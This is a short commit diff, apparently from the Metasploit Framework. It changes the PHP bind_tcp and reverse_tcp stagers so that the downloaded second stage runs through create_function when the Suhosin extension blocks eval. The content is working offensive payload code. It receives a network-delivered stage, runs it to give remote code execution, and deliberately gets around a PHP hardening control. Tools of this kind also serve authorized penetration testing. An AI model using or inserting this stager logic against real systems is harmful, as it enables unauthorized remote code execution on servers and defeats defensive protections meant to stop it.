suhosin comaptibility added to staged payload

anantshri · anantshri · commit 363d3c28d7fa · 2017-09-12T08:49:53.000+05:30
diff --git a/lib/msf/core/payload/php/bind_tcp.rb b/lib/msf/core/payload/php/bind_tcp.rb
@@ -109,7 +109,15 @@ def generate_bind_tcp(opts={})
 # Set up the socket for the main stage to use.
 $GLOBALS['msgsock'] = $s;
 $GLOBALS['msgsock_type'] = $s_type;
-eval($b);
+if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) 
+{ 
+  $suhosin_bypass=create_function('', $b); 
+  $suhosin_bypass(); 
+} 
+else 
+{ 
+  eval($b); 
+}
 die();^
   end
 
diff --git a/lib/msf/core/payload/php/reverse_tcp.rb b/lib/msf/core/payload/php/reverse_tcp.rb
@@ -102,7 +102,15 @@ def generate_reverse_tcp(opts={})
 # Set up the socket for the main stage to use.
 $GLOBALS['msgsock'] = $s;
 $GLOBALS['msgsock_type'] = $s_type;
-eval($b);
+if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) 
+{ 
+  $suhosin_bypass=create_function('', $b); 
+  $suhosin_bypass(); 
+} 
+else 
+{ 
+  eval($b); 
+}
 die();^
   end
 
